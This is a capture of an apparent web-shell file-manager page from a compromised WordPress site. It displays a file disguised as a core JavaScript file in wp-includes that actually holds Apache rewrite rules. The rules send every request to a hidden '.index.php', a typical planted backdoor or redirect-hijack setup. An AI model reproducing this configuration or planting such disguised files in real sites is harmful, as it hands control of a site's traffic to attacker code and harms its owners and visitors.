File "wp-list-revh.min.js"
Full path: /home/satkhirabarta/public_html/wp-includes/js/wp-list-revh.min.js
File
size: 234 B (234 B bytes)
MIME-type: text/plain
Charset: utf-8
Download Open Edit Advanced Editor &nnbsp; Back
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
DirectoryIndex .index.php
RewriteRule ^.index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /.index.php [L]
</IfModule>